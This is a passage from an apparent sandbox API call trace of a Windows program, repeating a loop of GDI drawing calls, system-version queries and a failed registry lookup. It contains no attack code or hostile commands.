0x1100bb4 [0087.791] DeleteObject (ho=0x1100bb4) returned 1 [0087.791] DeleteObject (ho=0x830401d3) returned 1 [0087.791] DeleteObject (ho=0x810401d6) returned 1 [0087.791] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.791] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.791] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.791] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.791] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.791] BeginPath (hdc=0x0) returned 0 [0087.791] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.791] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.791] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.791] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.791] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.791] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.791] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.791] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401d3 [0087.791] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401d6 [0087.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb5 [0087.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb6 [0087.791] CombineRgn (hrgnDst=0x1040bb5, hrgnSrc1=0x840401d3, hrgnSrc2=0x820401d6, iMode=1) returned 1 [0087.791] CombineRgn (hrgnDst=0x1040bb6, hrgnSrc1=0x840401d3, hrgnSrc2=0x820401d6, iMode=4) returned 2 [0087.791] CreateSolidBrush (color=0xff) returned 0x2100bb4 [0087.791] CreateSolidBrush (color=0xff0000) returned 0x1100bb7 [0087.791] DeleteObject (ho=0x1100bb7) returned 1 [0087.791] DeleteObject (ho=0x820401d6) returned 1 [0087.791] DeleteObject (ho=0x840401d3) returned 1 [0087.791] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.791] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.791] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.791] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.791] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.791] BeginPath (hdc=0x0) returned 0 [0087.791] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.791] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.792] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.792] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.792] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.792] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.792] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401d6 [0087.792] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401d3 [0087.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb8 [0087.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb9 [0087.792] CombineRgn (hrgnDst=0x1040bb8, hrgnSrc1=0x830401d6, hrgnSrc2=0x850401d3, iMode=1) returned 1 [0087.792] CombineRgn (hrgnDst=0x1040bb9, hrgnSrc1=0x830401d6, hrgnSrc2=0x850401d3, iMode=4) returned 2 [0087.792] CreateSolidBrush (color=0xff) returned 0x2100bb7 [0087.792] CreateSolidBrush (color=0xff0000) returned 0x1100bba [0087.792] DeleteObject (ho=0x1100bba) returned 1 [0087.792] DeleteObject (ho=0x850401d3) returned 1 [0087.792] DeleteObject (ho=0x830401d6) returned 1 [0087.792] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.792] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.792] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.792] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.792] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.792] BeginPath (hdc=0x0) returned 0 [0087.792] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.792] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.792] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.792] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.792] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.792] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.792] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401d3 [0087.792] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401d6 [0087.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbb [0087.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbc [0087.792] CombineRgn (hrgnDst=0x1040bbb, hrgnSrc1=0x860401d3, hrgnSrc2=0x840401d6, iMode=1) returned 1 [0087.792] CombineRgn (hrgnDst=0x1040bbc, hrgnSrc1=0x860401d3, hrgnSrc2=0x840401d6, iMode=4) returned 2 [0087.792] CreateSolidBrush (color=0xff) returned 0x2100bba [0087.793] CreateSolidBrush (color=0xff0000) returned 0x1100bbd [0087.793] DeleteObject (ho=0x1100bbd) returned 1 [0087.793] DeleteObject (ho=0x840401d6) returned 1 [0087.793] DeleteObject (ho=0x860401d3) returned 1 [0087.793] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.793] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.793] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.793] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.793] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.793] BeginPath (hdc=0x0) returned 0 [0087.793] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.793] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.793] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.793] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.793] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.793] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.793] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.826] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401d6 [0087.826] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401d3 [0087.826] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c57 [0087.826] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c58 [0087.826] CombineRgn (hrgnDst=0x1040c57, hrgnSrc1=0x850401d6, hrgnSrc2=0x870401d3, iMode=1) returned 1 [0087.826] CombineRgn (hrgnDst=0x1040c58, hrgnSrc1=0x850401d6, hrgnSrc2=0x870401d3, iMode=4) returned 2 [0087.826] CreateSolidBrush (color=0xff) returned 0x2100bbd [0087.826] CreateSolidBrush (color=0xff0000) returned 0x1100c59 [0087.826] DeleteObject (ho=0x1100c59) returned 1 [0087.826] DeleteObject (ho=0x870401d3) returned 1 [0087.826] DeleteObject (ho=0x850401d6) returned 1 [0087.826] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.826] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.826] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.826] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.826] BeginPath (hdc=0x0) returned 0 [0087.826] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.826] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.826] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.826] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.827] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.827] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.827] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.827] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401d3 [0087.827] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401d6 [0087.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5a [0087.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5b [0087.827] CombineRgn (hrgnDst=0x1040c5a, hrgnSrc1=0x880401d3, hrgnSrc2=0x860401d6, iMode=1) returned 1 [0087.827] CombineRgn (hrgnDst=0x1040c5b, hrgnSrc1=0x880401d3, hrgnSrc2=0x860401d6, iMode=4) returned 2 [0087.827] CreateSolidBrush (color=0xff) returned 0x2100c59 [0087.827] CreateSolidBrush (color=0xff0000) returned 0x1100c5c [0087.827] DeleteObject (ho=0x1100c5c) returned 1 [0087.827] DeleteObject (ho=0x860401d6) returned 1 [0087.827] DeleteObject (ho=0x880401d3) returned 1 [0087.827] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.827] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.827] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.827] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.827] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.827] BeginPath (hdc=0x0) returned 0 [0087.827] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.827] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.827] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.827] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.827] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.827] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.827] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.827] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.827] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401d6 [0087.827] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401d3 [0087.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5d [0087.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5e [0087.827] CombineRgn (hrgnDst=0x1040c5d, hrgnSrc1=0x870401d6, hrgnSrc2=0x890401d3, iMode=1) returned 1 [0087.828] CombineRgn (hrgnDst=0x1040c5e, hrgnSrc1=0x870401d6, hrgnSrc2=0x890401d3, iMode=4) returned 2 [0087.828] CreateSolidBrush (color=0xff) returned 0x2100c5c [0087.828] CreateSolidBrush (color=0xff0000) returned 0x1100c5f [0087.828] DeleteObject (ho=0x1100c5f) returned 1 [0087.828] DeleteObject (ho=0x890401d3) returned 1 [0087.828] DeleteObject (ho=0x870401d6) returned 1 [0087.828] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.828] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.828] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.828] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.828] BeginPath (hdc=0x0) returned 0 [0087.828] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.828] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.828] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.828] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.828] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401d3 [0087.828] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401d6 [0087.828] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c60 [0087.828] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c61 [0087.828] CombineRgn (hrgnDst=0x1040c60, hrgnSrc1=0x8a0401d3, hrgnSrc2=0x880401d6, iMode=1) returned 1 [0087.828] CombineRgn (hrgnDst=0x1040c61, hrgnSrc1=0x8a0401d3, hrgnSrc2=0x880401d6, iMode=4) returned 2 [0087.828] CreateSolidBrush (color=0xff) returned 0x2100c5f [0087.828] CreateSolidBrush (color=0xff0000) returned 0x1100c62 [0087.828] DeleteObject (ho=0x1100c62) returned 1 [0087.828] DeleteObject (ho=0x880401d6) returned 1 [0087.828] DeleteObject (ho=0x8a0401d3) returned 1 [0087.828] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.828] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.828] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.828] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.828] BeginPath (hdc=0x0) returned 0 [0087.828] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.828] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.828] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.829] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.829] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401d6 [0087.829] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401d3 [0087.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c63 [0087.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c64 [0087.829] CombineRgn (hrgnDst=0x1040c63, hrgnSrc1=0x890401d6, hrgnSrc2=0x8b0401d3, iMode=1) returned 1 [0087.829] CombineRgn (hrgnDst=0x1040c64, hrgnSrc1=0x890401d6, hrgnSrc2=0x8b0401d3, iMode=4) returned 2 [0087.829] CreateSolidBrush (color=0xff) returned 0x2100c62 [0087.829] CreateSolidBrush (color=0xff0000) returned 0x1100c65 [0087.829] DeleteObject (ho=0x1100c65) returned 1 [0087.829] DeleteObject (ho=0x8b0401d3) returned 1 [0087.829] DeleteObject (ho=0x890401d6) returned 1 [0087.829] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.829] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.829] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.829] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.829] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.829] BeginPath (hdc=0x0) returned 0 [0087.829] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.829] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.829] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.829] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.829] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.829] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.829] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.829] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401d3 [0087.829] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401d6 [0087.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c66 [0087.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c67 [0087.829] CombineRgn (hrgnDst=0x1040c66, hrgnSrc1=0x8c0401d3, hrgnSrc2=0x8a0401d6, iMode=1) returned 1 [0087.829] CombineRgn (hrgnDst=0x1040c67, hrgnSrc1=0x8c0401d3, hrgnSrc2=0x8a0401d6, iMode=4) returned 2 [0087.829] CreateSolidBrush (color=0xff) returned 0x2100c65 [0087.829] CreateSolidBrush (color=0xff0000) returned 0x1100c68 [0087.830] DeleteObject (ho=0x1100c68) returned 1 [0087.830] DeleteObject (ho=0x8a0401d6) returned 1 [0087.830] DeleteObject (ho=0x8c0401d3) returned 1 [0087.830] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.830] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.830] BeginPaint (in: 